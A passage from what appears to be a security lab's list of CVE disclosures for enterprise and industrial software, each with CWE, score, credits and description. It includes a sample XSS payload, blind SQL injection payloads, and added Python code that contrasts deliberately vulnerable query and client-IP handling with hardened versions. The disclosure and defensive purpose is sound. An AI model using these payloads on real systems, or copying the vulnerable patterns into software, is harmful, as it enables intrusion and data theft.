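        "SELECT id, message FROM alerts WHERE ext_identifier = '"
        + ext_identifier + "'"
    )
    return con.execute(sql).fetchall()


def hardened_search(con, ext_identifier):
    """The value travels as a bound parameter and is matched literally; the
    same inputs that toggled the oracle now simply match no alert."""
    return con.execute(
        "SELECT id, message FROM alerts WHERE ext_identifier = ?",
        (ext_identifier,),
    ).fetchall()


def search_raises_db_error(con, ext_identifier):
    """Reproduces the first probe in the write-up: does this value make the
    concatenated statement fail with a DBMS error?"""
    try:
        vulnerable_search(con, ext_identifier)
    except sqlite3.OperationalError:
        return True
    return False
```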
Vulnerability Description: Incomplete Cleanup – CWE-459
Software Version: <=18B
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-32571
CVSv3: 4.9
Severity: Medium
Credits: Alessandro Bosco, Mohamed Amine Ouad, Massimiliano Brolli
In OSS-RC systems of release 18B and older, during data migration procedures, certain files containing usernames and passwords are left undeleted on the system, although in folders accessible only by top-privileged accounts.
NOTE: This vulnerability only affects products that are no longer supported by the maintainer. Ericsson Network Manager is a new generation OSS system which OSS-RC customers shall upgrade to.
Vulnerability Description: Exposure of Resource to Wrong Sphere – CWE-668
Software Version: < 21.2
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-32570
CVSv3: 4.9
Severity: Medium
Credits: Alessandro Bosco, Mohamed Amine Ouad, Massimiliano Brolli
In ENM releases before 21.2, users belonging to the same AMOS authorization group can retrieve the data from certain log files. All AMOS users are considered highly privileged users in the ENM system, and all must be previously defined and authorized by the Security Administrator. Those users can access some log files under a common path and read the information stored in them in order to conduct privilege escalation.
The vulnerability details can be shared from vendor to customers upon request.
Vulnerability Description: Improper Neutralization of Input During Web Page Generation ('Reflected Cross-site Scripting') – CWE-79
Software Version: <=18B
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-32569
CVSv3: 6.1
Severity: Medium
Credits: Alessandro Bosco, Mohamed Amine Ouad, Massimiliano Brolli
In OSS-RC systems of release 18B and older, the customer documentation browsing libraries under ALEX are subject to Cross-Site Scripting. This problem is completely resolved in the new Ericsson library browsing tool ELEX, used in systems like Ericsson Network Manager.
NOTE: This vulnerability only affects products that are no longer supported by the maintainer. Ericsson Network Manager is a new generation OSS system which OSS-RC customers shall upgrade to.
Vulnerability Description: CWE-732: Incorrect Permission Assignment for Critical Resource
Software Version: < 4.8.5
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-31540
CVSv3: 7.1
Severity: High
Credits: Francesco Giordano, Massimiliano Brolli
Wowza Streaming Engine through 4.8.5 (in a default installation) has incorrect file permissions of configuration files in the conf/ directory. A regular local user is able to read and write to all the configuration files, e.g., modify the application server configuration.
Figure 1: File permissions
Vulnerability Description: CWE-312: Cleartext Storage of Sensitive Information
Software Version: < 4.8.5
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-31539
CVSv3: 5.5
Severity: Medium
Credits: Francesco Giordano, Massimiliano Brolli
Wowza Streaming Engine through 4.8.5 (in a default installation) has cleartext passwords stored in the conf/admin.password file. A regular local user is able to read usernames and passwords.
Figure 1: File permissions
Vulnerability Description: Improper Neutralization of Input During Web Page Generation (Stored Cross-Site Scripting) - CWE-79
Software Version: Softing AG OPC Toolbox v4.10.1.13035
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-29661
CVSv3: 5.4
Severity: Medium
Credits: Gianni Palombizio, Michele Cisternino, Stefano Scipioni, Massimiliano Brolli
Softing AG OPC Toolbox version 4.10.1.13035 allows /en/diag_values.html Stored XSS on ITEMLISTVALUES##ITEMID parameter. A malicious user leveraging this vulnerability could inject arbitrary JavaScript into the trace file. The malicious payload will then be triggered every time an authenticated user browses the page containing it.
After logging in to the application with a valid user, the full request is shown on the left.
Figure 1: Full HTTP request
The malicious payload is: "><script>alert('XSS')</script>
The JavaScript code is executed when the victim user navigates to the "Diagnostic/Trace" tab.
Figure 2: XSS on response page
Vulnerability Description: Cross-Site Request Forgery (CSRF) - CWE-352
Software Version: Softing AG OPC Toolbox v4.10.1.13035
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-29660
CVSv3: 8.8
Severity: High
Credits: Gianni Palombizio, Michele Cisternino, Stefano Scipioni, Massimiliano Brolli
A Cross-Site Request Forgery (CSRF) vulnerability in Softing AG OPC Toolbox version 4.10.1.13035 and earlier allows attackers to reset the administrative password by inducing the Administrator user to browse a URL controlled by an attacker.
Create and serve a web page containing the following HTML code shown on the left.
Figure 1: HTML code for CSRF victim
The authenticated administrator browses the page configured by the attacker. The password reset request is made to the web application, using the admin's browsing session.
Figure 2: The page is served on the attacker system and requested by the victim
The password of the "Administrator" user is reset successfully.
Figure 3: CSRF password reset request executed successfully
Vulnerability Description: CWE-312: Cleartext Storage of Sensitive Information
Software Version: <= 8.12.2
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-28979
CVSv3: 6.5
Severity: Medium
Credits: Luca Di Giuseppe, Mattia Campanelli, Alessandro Sabetta, Massimiliano Brolli
SafeNet KeySecure Management Console 8.12.0 is vulnerable to HTTP response splitting attacks. A remote attacker could exploit this vulnerability using specially-crafted URL to cause the server to return a split response, once the URL is clicked.
Vulnerability Description: Exposure of Resource to Wrong Sphere – CWE-668
Software Version: < 21.2
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-28488
CVSv3: 6.5
Severity: Medium
Credits: Alessandro Bosco, Mohamed Amine Ouad, Massimiliano Brolli
In ENM releases before 21.2, users belonging to the same AMOS authorization group can retrieve data related to the managed network from each other. All AMOS users are considered highly privileged users in the ENM system, and all users must be previously defined and authorized by the Security Administrator. The vulnerability details can be shared from vendor to customers upon request.
Vulnerability Description: Relative Path Traversal (CWE-23)
Software Version: MSC-S IS 3.1 before IS 3.1 CP22
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-28485
CVSv3: 4.3
Severity: Medium
Credits: Alessandro Bosco, Mohamed Amine Ouad, Massimiliano Brolli
In Ericsson Mobile Switching Center Server (MSC-S) before IS 3.1 CP22, the SIS web application allows relative path traversal via a specific parameter in the https request after authentication, which allows access to files on the system that are not intended to be accessible via the web application. There is low impact to confidentiality because the affected files are limited to what the OTP webserver can access.
Vulnerability Description: Privilege Escalation via SUID/GUID file - CWE-250
Software Version: CA eHealth Performance Manager <= 6.3.2.12
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-28250
CVSv3: 7.8
Severity: High
Credits: Veno Eivazian, Alessandro Sabetta, Massimiliano Brolli
CA eHealth Performance Manager through 6.3.2.12 is affected by Privilege Escalation via a setuid (and/or setgid) file. When a component is run as an argument of the runpicEhealth executable, the script code will be executed as the ehealth user.
Vulnerability Description: Privilege Escalation via Dynamically Linked Shared Object Library - CWE-426
Software Version: CA eHealth Performance Manager <= 6.3.2.12
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-28249
CVSv3: 8.8
Severity: High
Credits: Veno Eivazian, Alessandro Sabetta, Massimiliano Brolli
CA eHealth Performance Manager through 6.3.2.12 is affected by Privilege Escalation via a Dynamically Linked Shared Object Library. To exploit the vulnerability, the ehealth user must create a malicious library in the writable RPATH, to be dynamically linked when the FtpCollector executable is run. The code in the library will be executed as the root user.
Vulnerability Description: Improper Restriction of Excessive Authentication Attempts - CWE-307
Software Version: CA eHealth Performance Manager <= 6.3.2.12
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-28248
CVSv3: 7.5
Severity: High
Credits: Veno Eivazian, Alessandro Sabetta, Massimiliano Brolli
CA eHealth Performance Manager through 6.3.2.12 is affected by Improper Restriction of Excessive Authentication Attempts. An attacker is able to perform an arbitrary number of /web/frames/ authentication attempts using different passwords, and eventually gain access to a targeted account.
Vulnerability Description: Multiple Reflected Cross-site Scripting - CWE-79
Software Version: CA eHealth Performance Manager <= 6.3.2.12
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-28247
CVSv3: 5.4
Severity: Medium
Credits: Veno Eivazian, Alessandro Sabetta, Massimiliano Brolli
CA eHealth Performance Manager through 6.3.2.12 is affected by Cross Site Scripting (XSS). The impact is: An authenticated remote user is able to inject arbitrary web script or HTML due to incorrect sanitization of user-supplied data and perform a Reflected Cross-Site Scripting attack against the platform users. The affected endpoints are: cgi/nhWeb with the parameter report, aviewbin/filtermibobjects.pl with the parameter namefilter, and aviewbin/query.pl with the parameters System, SystemText, Group, and GroupText.
Vulnerability Description: Privilege Escalation via Dynamically Linked Shared Object Library - CWE-426
Software Version: CA eHealth Performance Manager <= 6.3.2.12
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-28246
CVSv3: 7.8
Severity: High
Credits: Veno Eivazian, Alessandro Sabetta, Massimiliano Brolli
CA eHealth Performance Manager through 6.3.2.12 is affected by Privilege Escalation via a Dynamically Linked Shared Object Library. A regular user must create a malicious library in the writable RPATH, to be dynamically linked when the emtgtctl2 executable is run. The code in the library will be executed as the ehealth user.
Vulnerability Description: Unrestricted Upload of File with Dangerous Type - CWE-434
Software Version: NOKIA NetAct 18A
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-26597
CVSv3: 6.5
Severity: Medium
Credits: Raffaella Robles, Andrea Carlo Maria Dattola, Massimiliano Brolli
An issue was discovered in Nokia NetAct 18A. A remote user, authenticated to the NOKIA NetAct Web Page, can visit the Site Configuration Tool web site section and arbitrarily upload potentially dangerous files without restrictions via the /netact/sct dir parameter in conjunction with the operation=upload value.
Vulnerability Description: Improper Neutralization of Input During Web Page Generation (Stored Cross-Site Scripting) - CWE-79
Software Version: NOKIA NetAct 18A
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-26596
CVSv3: 5.4
Severity: Medium
Credits: Raffaella Robles, Andrea Carlo Maria Dattola, Massimiliano Brolli
An issue was discovered in Nokia NetAct 18A. A malicious user can change a filename of an uploaded file to include JavaScript code, which is then stored and executed by a victim's web browser. The most common mechanism for delivering malicious content is to include it as a parameter in a URL that is posted publicly or e-mailed directly to victims. Here, the /netact/sct filename parameter is used.
Vulnerability Description: Improper Neutralization of Input During Web Page Generation (Stored Cross-Site Scripting) - CWE-79
Software Version: <= 3.1.2.18
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-3314
CVSv3: 6.1
Severity: Medium
Credits: Francesco Giordano, Massimiliano Brolli
** UNSUPPORTED WHEN ASSIGNED ** Oracle GlassFish Server 3.1.2.18 and below allows /common/logViewer/logViewer.jsf XSS. A malicious user can cause an administrator user to supply dangerous content to the vulnerable page, which is then reflected back to the user and executed by the web browser. The most common mechanism for delivering malicious content is to include it as a parameter in a URL that is posted publicly or e-mailed directly to victims. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
Vulnerability Description: URL Redirection to Untrusted Site ('Open Redirect')
Software Version: Oracle Business Intelligence Enterprise Edition of Oracle Fusion Middleware. The affected versions are 5.5.0.0.0, 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0.
NIST: https://nvd.nist.gov/vuln/detail/CVE-2021-2005
Oracle Credits CPU 2021: https://www.oracle.com/security-alerts/cpujan2021.html
CVSv3: 4.7
Severity: Medium
Credits: Alessandro Bosco, Luca Di Giuseppe, Francesco Russo, Edoardo Predieri, Fabio Minarelli, Massimiliano Brolli
Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Analytics Actions) allows unauthenticated attacker to construct a URL within the application that causes a redirection to an arbitrary external domain. This behavior can be leveraged to facilitate phishing attacks against users of the application.
Vulnerability Description: Improper Restriction of Excessive Authentication Attempts (Rate Limit Bypass on login page)
Software Version: WordPress Plugin Limit Login Attempts Reloaded versions 2.13.0 – 2.17.3.
NIST: https://nvd.nist.gov/vuln/detail/CVE-2020-35590
CVSv3: 9.8
Severity: Critical
Credits: Veno Eivazian
LimitLoginAttempts.php in the limit-login-attempts-reloaded plugin before 2.17.4 for WordPress allows a bypass of (per IP address) rate limits because the X-Forwarded-For header can be forged. When the plugin is configured to accept an arbitrary header for the client source IP address, a malicious user is not limited to perform a brute force attack, because the client IP header accepts any arbitrary string. When randomizing the header input, the login count does not ever reach the maximum allowed retries.
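The bypass works because the limiter keys its counter on a header the client chooses. The following added example is not code from the original plugin or advisory: it shows that client-IP resolution beside one that only honours X-Forwarded-For when the connection arrives from a known reverse proxy, and a small lockout counter run against a stream of attempts with a fresh forged header each time. The proxy range, lockout threshold and peer addresses are constructed.

```python
"""Added example: client-IP resolution behind the rate-limit bypass, the
proxy-aware version, and a lockout counter exercised against both.
TRUSTED_PROXIES, MAX_RETRIES and the sample addresses are constructed."""
import secrets
from collections import Counter
from ipaddress import ip_address, ip_network

TRUSTED_PROXIES = [ip_network("10.0.0.0/8")]   # constructed: where our reverse proxy lives
MAX_RETRIES = 4                                 # constructed lockout threshold


def weak_client_ip(peer_ip, headers):
    """The bypassed behaviour: the configured header is taken verbatim, so
    the attacker picks the key the limiter counts under."""
    return headers.get("X-Forwarded-For", peer_ip)


def _is_trusted_proxy(addr):
    return any(addr in net for net in TRUSTED_PROXIES)


def hardened_client_ip(peer_ip, headers):
    """Honour X-Forwarded-For only when the socket peer is our proxy, and
    then take the right-most hop that is not itself one of our proxies."""
    if not _is_trusted_proxy(ip_address(peer_ip)):
        return peer_ip   # direct connection: header is attacker-controlled
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",") if h.strip()]
    for hop in reversed(hops):
        try:
            addr = ip_address(hop)
        except ValueError:
            return peer_ip   # not an IP at all: fall back to the socket address
        if not _is_trusted_proxy(addr):
            return str(addr)
    return peer_ip


class LoginLimiter:
    """Per-key failure counter: once a key reaches max_retries failures,
    further attempts under that key are refused."""

    def __init__(self, resolve_ip, max_retries=MAX_RETRIES):
        self.resolve_ip = resolve_ip
        self.max_retries = max_retries
        self.failures = Counter()

    def attempt(self, peer_ip, headers, password_ok=False):
        """True if the attempt is evaluated, False if the key is locked out."""
        key = self.resolve_ip(peer_ip, headers)
        if self.failures[key] >= self.max_retries:
            return False
        if not password_ok:
            self.failures[key] += 1
        return True


def simulate_forged_headers(resolve_ip, attempts=20):
    """Attacker connecting directly from 203.0.113.5 (constructed) and sending
    a random X-Forwarded-For on every attempt, all with wrong passwords.
    Returns how many attempts the limiter let through."""
    limiter = LoginLimiter(resolve_ip)
    allowed = 0
    for _ in range(attempts):
        forged = {"X-Forwarded-For": secrets.token_hex(4)}
        if limiter.attempt("203.0.113.5", forged):
            allowed += 1
    return allowed
```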
Vulnerability Description: Improper Neutralization of Input During Web Page Generation (Reflected Cross-Site Scripting) - CWE-79
Software Version: WordPress Plugin Limit Login Attempts Reloaded versions 2.13.0 – 2.17.3.
NIST: https://nvd.nist.gov/vuln/detail/CVE-2020-35589
CVSv3: 5.4
Severity: Medium
Credits: Veno Eivazian
The limit-login-attempts-reloaded plugin before 2.17.4 for WordPress allows wp-admin/options-general.php?page=limit-login-attempts&tab= XSS. A malicious user can cause an administrator user to supply dangerous content to the vulnerable page, which is then reflected back to the user and executed by the web browser. The most common mechanism for delivering malicious content is to include it as a parameter in a URL that is posted publicly or e-mailed directly to victims.
Vulnerability Description: Windows Unquoted Search Path
Software Version: Schneider Electric StruxureWare Building Operation Enterprise Server Installer versions 1.0 – 3.1 and Enterprise Central Installer versions 2.0 – 3.1.
NIST: https://nvd.nist.gov/vuln/detail/CVE-2020-28209
CVSv3: 7.0
Severity: High
Credits: Alessandro Bosco, Luca Di Giuseppe, Alessandro Sabetta, Massimiliano Brolli
Any local Windows user who has write permission on at least one of the subfolders of the Connect Agent service binary path is able to gain the privileges of the user who started the service. By default, the Enterprise Server and Enterprise Central are always installed at a location requiring Administrator privileges, so the vulnerability is only valid if the application has been installed in a non-secure location.
Vulnerability Description: CWE-502: Deserialization of Untrusted Data
Software Version: IBM InfoSphere Information Server 8.5.0.0
NIST: https://nvd.nist.gov/vuln/detail/CVE-2020-27583
CVSv3: 9.8
Severity: Critical
Credits: Damiano Proietti, Davide De Rubeis, Matteo Brutti, Alessandro Sabetta, Massimiliano Brolli
IBM InfoSphere Information Server 8.5.0.0 is affected by deserialization of untrusted data which could allow remote unauthenticated attackers to execute arbitrary code.
Vulnerability Description: Stored XSS
Software Version: 3.1.12.0
NIST: https://nvd.nist.gov/vuln/detail/CVE-2020-17458
CVSv3: 5.4
Severity: Medium
Credits: Francesco Giordano, Sebastiano Lanzarotto, Francesco Pigini, Massimiliano Brolli
Multiple XSS issues were found in MultiUX; almost every parameter in the mailbox creation page is vulnerable to stored XSS.
Vulnerability Description: Improper Neutralization of Input During Web Page Generation (Reflected Cross-Site Scripting) - CWE-79
Software Version: Fujitsu ServerView Suite iRMC v8.08F
NIST: https://nvd.nist.gov/vuln/detail/CVE-2020-17457
CVSv3: 5.4
Severity: Medium
Credits: Damiano Proietti, Stefano Scipioni, Massimiliano Brolli
Fujitsu ServerView Suite iRMC before 9.62F allows '/54?ms=9&lang=0&sid=' XSS on the PSCU_FILE_INIT parameter. A malicious user can insert a malicious payload in the XML configuration file. After selecting 'Save Configuration', the payload is triggered in the error response page, which is then reflected to the user and executed by the web browser.
The full request is the following:
Figure 1: The full HTTP request
The JavaScript code is executed when the error message is displayed:
Figure 2: XSS on error message
Vulnerability Description: CWE-200: Exposure of Sensitive Information to an Unauthorized Actor
Software Version: All versions
NIST: https://nvd.nist.gov/vuln/detail/CVE-2020-15794
CVSv3: 4.3
Severity: Medium
Credits: Davide De Rubeis, Damiano Proietti, Matteo Brutti, Stefano Scipioni, Massimiliano Brolli
Some error messages in the web application show the absolute path to the requested resource. This could allow an authenticated attacker to retrieve additional information about the host system.
The following URL is enough to trigger the vulnerability:
Figure 1: if the requested file doesn't exist, the application returns the full path it searched in
Vulnerability Description: CWE-1021: Improper Restriction of Rendered UI Layers or Frames
Software Version: All versions
NIST: https://nvd.nist.gov/vuln/detail/CVE-2020-15793
CVSv3: 4.5
Severity: Medium
Credits: Davide De Rubeis, Damiano Proietti, Matteo Brutti, Stefano Scipioni, Massimiliano Brolli
The device does not properly set the X-Frame-Options HTTP Header which makes it vulnerable to Clickjacking attacks. This could allow an unauthenticated attacker to retrieve or modify data in the context of a legitimate user by tricking that user to click on a website controlled by the attacker.
Vulnerability Description: CWE-89: Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)
Software Version: All versions
NIST: https://nvd.nist.gov/vuln/detail/CVE-2020-15792
CVSv3: 4.3
Severity: Medium
Credits: Davide De Rubeis, Damiano Proietti, Matteo Brutti, Stefano Scipioni, Massimiliano Brolli
The web service does not properly apply input validation for the ID query parameter in a reserved area on the following URL
This could allow an authenticated attacker to retrieve data via a content-based blind SQL injection attack, using for example the following payloads:
Figure 1: true condition returns the object 465587
For a "true" response:
id=465587%20and%20%20%27asd%27=%27asd%27%20--
Figure 2: false condition returns an error on the index
For a "false" response:
id=465587%20and%20%20%27asd%27=%27xxx%27%20--
Vulnerability Description: Unrestricted Upload of File with Dangerous Type
Software Version: Oracle Business Intelligence Enterprise Edition of Oracle Fusion Middleware. The affected versions are 5.5.0.0.0, 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0.
NIST: https://nvd.nist.gov/vuln/detail/CVE-2020-14843
Oracle Credits CPU 2020: https://www.oracle.com/security-alerts/cpuoct2020.html
CVSv3: 7.1
Severity: High
Credits: Alessandro Bosco, Luca Di Giuseppe, Francesco Russo, Edoardo Predieri, Fabio Minarelli, Massimiliano Brolli
Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Analytics Actions) allows an authenticated attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Business Intelligence Enterprise Edition accessible data, as well as malware spreading and unauthorized update, insert or delete access to some of Oracle Business Intelligence Enterprise Edition accessible data.
Vulnerability Description:
Software Version: Oracle Business Intelligence Enterprise Edition of Oracle Fusion Middleware. The affected versions are 5.5.0.0.0, 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0.
NIST: https://nvd.nist.gov/vuln/detail/CVE-2020-14842
Oracle Credits CPU 2020: https://www.oracle.com/security-alerts/cpuoct2020.html
CVSv3: 8.2
Severity: High
Credits: Alessandro Bosco, Luca Di Giuseppe, Francesco Russo, Edoardo Predieri, Fabio Minarelli, Massimiliano Brolli
Multiple vulnerabilities in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Analytics Actions) allow an authenticated attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks of these vulnerabilities can result in unauthorized access to critical data or complete access to all Oracle Business Intelligence Enterprise Edition accessible data, as well as malware spreading and unauthorized update, insert or delete access to some of Oracle Business Intelligence Enterprise Edition accessible data.
Vulnerability Description:
Software Version: Oracle Business Intelligence Enterprise Edition of Oracle Fusion Middleware. The affected versions are 5.5.0.0.0, 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0.
NIST: https://nvd.nist.gov/vuln/detail/CVE-2020-14690
CVSv3: 8.2
Severity: High
Credits: Alessandro Bosco, Edoardo Predieri, Fabio Minarelli, Francesco Russo, Luca Di Giuseppe, Massimiliano Brolli
Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Analytics Actions) allows an unauthenticated attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks require human interaction from a person other than the attacker and, while the vulnerability is in Oracle Business Intelligence Enterprise Edition, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Business Intelligence Enterprise Edition accessible data, as well as unauthorized update, insert or delete access to some of Oracle Business Intelligence Enterprise Edition accessible data.
Vulnerability Description: Improper Limitation of a Pathname to a Restricted Directory ('Full Path Traversal') - CWE-22
Software Version: FlexNet Publisher 11.12.1
NIST: https://nvd.nist.gov/vuln/detail/CVE-2020-12081
CVSv3: 7.5
Severity: High
Credits: Alessandro Bosco, Luca Di Giuseppe, Alessandro Sabetta, Massimiliano Brolli
Step-by-step instructions and PoC
A remote user, authenticated to FlexNet Publisher License Administrator, is able to define an arbitrary full path name in which to save the application logs. By using the "view logs" functionality, the attacker can then access the content of the previously specified file.
Affected Endpoints:
Below is the evidence with the vulnerability details and the payloads used.
The HTTP request used by the attacker to change the full path name of the logs to win.ini
Using the "view logs" function, the malicious user can access the previously specified file
Security Impact
By exploiting this issue an attacker is able to read arbitrary files from the file system of the target server.
Vulnerability Description: CWE-22: Full Path Traversal
Software Version: Johnson Controls Metasys MREWeb Service 9.0.0.4256
NIST: https://nvd.nist.gov/vuln/detail/CVE-2020-9050
CVSv3: 7.5
Severity: High
Credits: Alessandro Bosco, Luca Di Giuseppe, Stefano Scipioni, Massimiliano Brolli
A remote non-authenticated attacker can define an arbitrary full path name while using the web resource /MREService/Download.aspx. By using this functionality, an attacker can download arbitrary files from the system.
Vulnerability Description: Improper Access Control
Software Version: Schneider Electric StruxureWare Building Operation WebReports versions 1.9 – 3.1.
NIST: https://nvd.nist.gov/vuln/detail/CVE-2020-7573
CVSv3: 6.5
Severity: Medium
Credits: Alessandro Bosco, Luca Di Giuseppe, Alessandro Sabetta, Massimiliano Brolli
A remote non-authenticated attacker is able to access a restricted web resource due to improper access control.
Vulnerability Description: Improper Restriction of XML External Entity Reference
Software Version: Schneider Electric StruxureWare Building Operation WebReports versions 1.9 – 3.1.
NIST: https://nvd.nist.gov/vuln/detail/CVE-2020-7572
CVSv3: 8.8
Severity: High
Credits: Alessandro Bosco, Luca Di Giuseppe, Alessandro Sabetta, Massimiliano Brolli
A remote user, authenticated to Building Operation WebReports, is able to inject arbitrary XML code containing a reference to an external entity via a crafted HTTP request into the server-side XML parser without it being sanitized. By exploiting this vulnerability, an attacker can access the contents of a file on the system potentially containing sensitive data, reach other restricted web resources via server-side request forgery, perform port scanning from the perspective of the machine where the parser is located, and cause other system impacts such as a denial of service.
Vulnerability Description: Improper Neutralization of Input During Web Page Generation (Cross-Site Scripting Reflected)
Software Version: Schneider Electric StruxureWare Building Operation WebReports versions 1.9 – 3.1.
NIST: https://nvd.nist.gov/vuln/detail/CVE-2020-7571
CVSv3: 5.4
Severity: Medium
Credits: Alessandro Bosco, Luca Di Giuseppe, Alessandro Sabetta, Massimiliano Brolli
Multiple Improper Neutralization of Input During Web Page Generation (Cross-site Scripting Reflected) vulnerabilities exist that could allow a remote attacker to inject arbitrary web script or HTML, due to incorrect sanitization of user-supplied data, and achieve a reflected Cross-Site Scripting attack against other WebReports users.
Vulnerability Description: Improper Neutralization of Input During Web Page Generation (Cross-Site Scripting Stored)
Software Version: Schneider Electric StruxureWare Building Operation WebReports versions 1.9 – 3.1.
NIST: https://nvd.nist.gov/vuln/detail/CVE-2020-7570
CVSv3: 5.4
Severity: Medium
Credits: Alessandro Bosco, Luca Di Giuseppe, Alessandro Sabetta, Massimiliano Brolli
An Improper Neutralization of Input During Web Page Generation (Cross-site Scripting Stored) vulnerability exists that could allow an authenticated remote user to inject arbitrary web script or HTML, due to incorrect sanitization of user-supplied data, and achieve a stored Cross-Site Scripting attack against other WebReports users.
Vulnerability Description: Unrestricted Upload of File with Dangerous Type
Software Version: Schneider Electric StruxureWare Building Operation WebReports versions 1.0 – 3.1.
NIST: https://nvd.nist.gov/vuln/detail/CVE-2020-7569
CVSv3: 8.8
Severity: High
Credits: Alessandro Bosco, Luca Di Giuseppe, Alessandro Sabetta, Massimiliano Brolli
An Unrestricted Upload of File with Dangerous Type vulnerability exists that could allow an authenticated remote user to upload arbitrary files, due to incorrect verification of user-supplied files, and achieve remote code execution.
Vulnerability Description: Information Disclosure
Software Version: QES 2.0.0
NIST: https://nvd.nist.gov/vuln/detail/CVE-2020-2505
CVSv3: 2.3
Severity: Low
Credits: Francesco Giordano, Francesco Pigini, Sebastiano Lanzarotto, Massimiliano Brolli
In QNAP QES 2.0.0 there is a vulnerability that allows an attacker to exploit a type confusion to find information on the platform.
Vulnerability Description: Arbitrary File Download
Software Version: QES 2.0.0
NIST: https://nvd.nist.gov/vuln/detail/CVE-2020-2504
CVSv3: 7.5
Severity: High
Credits: Francesco Giordano, Francesco Pigini, Sebastiano Lanzarotto, Massimiliano Brolli
A vulnerability was found in QNAP QES 2.0 that allows an authenticated attacker to escape the webroot and download files from the NAS. The vulnerability resides in the download functionality.
Vulnerability Description: Stored XSS via Arbitrary File upload
Software Version: QES 2.0.0
NIST: https://nvd.nist.gov/vuln/detail/CVE-2020-2503
CVSv3: 5.4
Severity: Medium
Credits: Francesco Giordano, Francesco Pigini, Sebastiano Lanzarotto, Massimiliano Brolli
A vulnerability was found in QNAP QES 2.0 that, if exploited, could allow remote attackers to inject malicious code in File Station. The vulnerability resides in the upload functionality, which does not perform correct sanitization.
Vulnerability Description: OS Command Injection Pre-Auth
Software Version: VAM: Visual Access Manager - 4.15.0 > 4.29
NIST: https://nvd.nist.gov/vuln/detail/CVE-2019-19994
CVSv3: 9.8
Severity: Critical
Credits: Alessandro Bosco, Luca Di Giuseppe, Mattia Campanelli, Valerio Preti, Stefano Scipioni, Massimiliano Brolli.
An attacker without authentication is able to execute arbitrary operating system commands by injecting into an HTTP POST parameter of the PHP web page.
Vulnerability Description: Multiple Full Path Disclosure Pre-Auth
Software Version: VAM: Visual Access Manager - 4.15.0 > 4.29
NIST: https://nvd.nist.gov/vuln/detail/CVE-2019-19993
CVSv3: 5.3
Severity: Medium
Credits: Alessandro Bosco, Luca Di Giuseppe, Mattia Campanelli, Valerio Preti, Stefano Scipioni, Massimiliano Brolli.
This server is configured to display PHP error messages. One or more fully qualified path names were found on this page. From this information the attacker may learn the file system structure of the web server, which can be used to conduct further attacks.
Vulnerability Description: Arbitrary file read Post-Auth
Software Version: VAM: Visual Access Manager - 4.15.0 > 4.29
NIST: https://nvd.nist.gov/vuln/detail/CVE-2019-19992
CVSv3: 6.5
Severity: Medium
Credits: Alessandro Bosco, Luca Di Giuseppe, Mattia Campanelli, Valerio Preti, Stefano Scipioni, Massimiliano Brolli.
A user with valid credentials is able to read XML files on the filesystem via the web interface. The PHP page does not check the parameter that identifies the file name to be read. Thus, an attacker can manipulate the file name to access any sensitive file within the filesystem.
Vulnerability Description: Multiple XSS reflected Pre-Auth
Software Version: VAM: Visual Access Manager - 4.15.0 > 4.29
NIST: https://nvd.nist.gov/vuln/detail/CVE-2019-19991
CVSv3: 5.4
Severity: Medium
Credits: Alessandro Bosco, Luca Di Giuseppe, Mattia Campanelli, Valerio Preti, Stefano Scipioni, Massimiliano Brolli.
A reflected Cross-site Scripting (XSS) vulnerability allows authenticated remote attackers to inject arbitrary web script or HTML into almost any HTTP GET/POST parameter that reflects the user input without sanitization.
Vulnerability Description: Multiple XSS Stored Post-Auth
Software Version: VAM: Visual Access Manager - 4.15.0 > 4.29
NIST: https://nvd.nist.gov/vuln/detail/CVE-2019-19990
CVSv3: 5.4
Severity: Medium
Credits: Alessandro Bosco, Luca Di Giuseppe, Mattia Campanelli, Valerio Preti, Stefano Scipioni, Massimiliano Brolli.
A stored Cross-site Scripting (XSS) vulnerability allows authenticated remote attackers to inject arbitrary web script or HTML into some HTTP GET/POST parameters whose user input is stored on the system and reflected back.
Vulnerability Description: Multiple Broken Access Control Pre-Auth
Software Version: VAM: Visual Access Manager - 4.15.0 > 4.29
NIST: https://nvd.nist.gov/vuln/detail/CVE-2019-19989
CVSv3: 7.5
Severity: High
Credits: Alessandro Bosco, Luca Di Giuseppe, Mattia Campanelli, Valerio Preti, Stefano Scipioni, Massimiliano Brolli.
Access control (authorization) determines which users can interact with systems and resources within the Web interface. When access control is broken, users could send unauthorized requests to the application. Unauthorized access to system functionality and resources creates an exploitable weakness that opens your company to harmful and potentially expensive outcomes.
Vulnerability Description: Arbitrary file write Post-Auth
Software Version: VAM: Visual Access Manager - 4.15.0 > 4.29
NIST: https://nvd.nist.gov/vuln/detail/CVE-2019-19988
